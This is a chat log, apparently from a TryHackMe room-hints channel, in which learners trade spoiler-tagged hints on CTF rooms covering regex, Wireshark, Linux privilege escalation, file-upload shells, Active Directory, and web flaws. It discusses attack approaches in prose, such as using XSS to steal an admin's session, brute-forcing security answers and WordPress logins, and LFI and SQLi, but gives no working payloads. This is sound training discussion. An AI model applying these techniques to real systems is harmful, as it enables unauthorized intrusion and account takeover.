Ty, got it
That was stupid of me
I believe in you @fleet swan
Another question @analog jetty "adding the username and the domain name (not the TLD) in separate groups "
Does this mean I do (username)and (domain)
yeah, exactly!
alright ty again!
you're welcome
Now I've checked and it looks like nothing is wrong about SUID... I've tried a lot of different things but can't figure out how to root this machine...
So can someone explain why sudo ls showed it, but the other did not?
maybe find has some weird SUID where it changes your user to some less privileged user
just a dumb guess, probably wrong
Run LinPeas or something.
looking for a hint on task 29 of Throwback. I know the user, but not sure how to get the pass.
oops. ty.
@analog jetty I'm sorry for tagging again π
But, to match the email addresses
What am I doing wrong?
||"(\w+)@(\w+).com"||works
But isn't accepted
Almost ! You actually need a \. and not a "."
your solution works but could match something that isn't an email as well
Oh right
Ty again xD
I'm really not looking forward to the regular expressions room, I deal with those in PowerShell and they are a pain, but I need to learn them
pls put that in a spoiler ||like this||
since this is #room-hints , it's better if you give a hint towards the answer than flat out giving the answer away
many people had the exact same issue and I told them to go back and read about wildcards
Anyone have a good hint on how to figure out the hidden URI for the File Upload Vulns room?
I'm stuck on task 9 and can't quite seem to figure out how to guess the date-time that gets appended to the shell I upload
I've been tracking my uploads in burp but the date time in the success response from the server doesn't seem to be accurate ...
Ah, ok. I figured it out. Not sure if it was the intended way ... but it didn't involve guessing the date-time stamp to activate the shell.
So I am looking right at the data required for the last question on task 8 in Wireshark 101, and it's not working. I am grabbing the data in the ICMP packet? Anybody else struggle with this one? GOT it, copy 'value'
was it SUID or SGID? Also the file might not have been accessible by the current user.
Stuck on the linux part 1 I did the task before, running binary is eluding me, even when reading prior task. Any help would be great
Do as what the task says.
Don't touch me touch the file
any good ways to recover the router in borderlands if connection to it is lost and the exploit keeps getting a "connection reset by peer" ? Is re-deploy and re-attack the only way ?
I got you
I'll say that from now
Hello guys, I'm here again with regexp :D
I've tried || ^\$\d\$\S || but it's not working
any hints please??
hi,
I am trying to complete the room "hackpack"
and I am stuck on one of the questions:
What is the name of the abnormal service running?
the abnormal service is ||WindowsScheluder.exe||
they even show it in the walkthrough video
but it doesn't take it as a valid answer, can anyone help?
|| ^\$\d\$\S. || not working too
what is one or more A plus if you get this hint
Match every possible IPv4 IP address (use metacharacters and groups)
|| (\d{1,3})\..{3}\d{1,3} || what am I doing wrong?? π¦
you're repeating the wrong pattern
also are you sure you wanted to do ||\..{3}|| ?
yes I am
yeah but I don't think that does what you think it does
in any case, you've realized that || in an IP address there's a pattern you want to repeat 3 times ||
maybe write it somewhere and try to figure out exactly what you want to repeat, and then put it into regex
I'm just a little bit confused
@stuck fractal this is not an answer
why is the http.cap an image and not a pcap file? I am unable to open and analyze.. Wireshark room
@viscid osprey try opening it with Wireshark (right click, open with Wireshark)
OMG thank you so much, and I learned something!!!
@viscid osprey No problem
need a nudge on Ra
kinda too hard
lol
I have some experience with HackTheBox, so I asked someone where I can start doing good AD, and he recommended Ra of THM
but I'm kinda stuck π
Where are you stuck?
got domain name and user name
smb, cant list shares
can't get TGTs since pre-auth is required
ig something has to do with that reset button
but idk the security answer
Look at the list of employees and see if they have anything you can use for the security answer
a guy has a green colored icon
one has yellow
everyone else is white
are u asking me to brute force?
or make an educated guess?
No
Look at the employees anything you can get maybe a school name, pet name first car or anything like that
I am seeing the first half of these answers, like Moz.... but not the rest of the unruly path. I'm in the right area? I've reached my 30 minute packet paralysis, and rabbit hole exploring.
thnx, will look into it
what d f, their emails
just saw them
T_T
Did you ever get an answer to "Adams Rite hardware fixtures are susceptible to a bypass where a wire is snaked through the keyway and actuates the locking mechanism behind it, what could prevent this bypass?" None of the resources or videos I can find seem to have the answer. π¦ been looking for over 2 weeks π¦
Hey James, the padlock one I got in the end but yeah that question...... neither me nor the guys I work with can figure it out π¦
I have some correct answers for the padlock one but the form won't accept them
RE the Adams Rite, it just needs a plate at the back of the keyway/lock
Just can't find a technical term
Yeah , just can not find the right wording for answer
Can someone give me a hint for the mr Robot room
Is /admin/index.html the right thing to look into deeper for getting the second flag?
Created file, ran binary, and did not receive anything, any suggestions? Linux part 1
Show us exactly what you did
Hi guys. I am not looking for an answer, just a hint. In OWASP Top 10, Task 29, I need to find an exploit, adjust the code and get the value from the passwd file. I found two exploits, none in Python. One is admin login, the second is XSS. I think I should use the second one (the first one worked but nothing useful there). Am I on the right path? Edit: Sorted, found the right file now.
Hey, can someone give me a hint for the "Investigating Windows" room, tasks 10 and 11? I'm looking in the Event Viewer and seeing these events but it's not taking my answers
Is it me or does THM not recognise any of the shortcut answers in the Burp Suite room?
Ah, needed a dash rather than a +
a knight carries a ?
π
Sorry for the ping, but I kinda realized that username can't be fire since thats the user account's name, so I kinda made a script to bruteforce the mother's maiden name option having usernames as they have in their email address and the mother's name as their name in the list
But no positives yet
box : all in one
I was like bruteforcing the WordPress for 1 hr.... didn't get the creds for user 'e'
If a bruteforce takes longer than a couple of mins on THM, You've done something wrong.
hi I'm in OWASP Juice Shop, Task 7, Question 2. I get the xss pop up when I visit the Last login page, but no flag. Any idea what I'm doing wrong? I'm open to DM to avoid spoilers for others. ....gonna call it a night, i'll try and get help tomorrow
I'm needing a bit of a hint on the Linux Strength Training room, Task 2, last question on finding the flag. I've read the files with hints, have found a file with the appropriate modification date in the right directory, and if I understand the hint for the question then I need to search the contents of the file for the flag. Stuffed if I can find it, though. I assume my search term in less is incorrect, but I'm struggling to work out the correct thing to search for.
Well, I found the flag using vi, stuffed if I know why I couldn't find it using less.
Hi. I have a question for Marketplace room. I found xss, but right now I'm stuck. Should I try to upload image somehow? for ex converting it to binary via form?
Think of the things you can get with an XSS on an admin user
Something easier
You have js execution on a site that only an admin can visit right?
Maybe use that js to steal something from them
Something that'd allow you too to be an admin if you identified with it
I could use a hint for all-in-one
Where are you stuck?
I have ||LFI|| and ||SQLi (got username & password hash)|| but I don't know if ||I should search for an interesting file with LFI or crack the password, went through all rockyou.txt and got nothing; or if I should look for something else||
With ||lfi|| did you try ||decoding the whole text||
Ok I got it thanks π
||password can't be cracked indeed :d ||
I'm doing the Linux Strength Training and I'm not getting a password by bruteforcing using the mentioned wordlist in task 7, is there any secret to this?
(The list I'm using is the data.txt which I found on the server as described in the task text)
Is it realistic that it is necessary to change e.g. the hash algorithm that is used, or is this fixed for gpg?
Try reversing the list?
No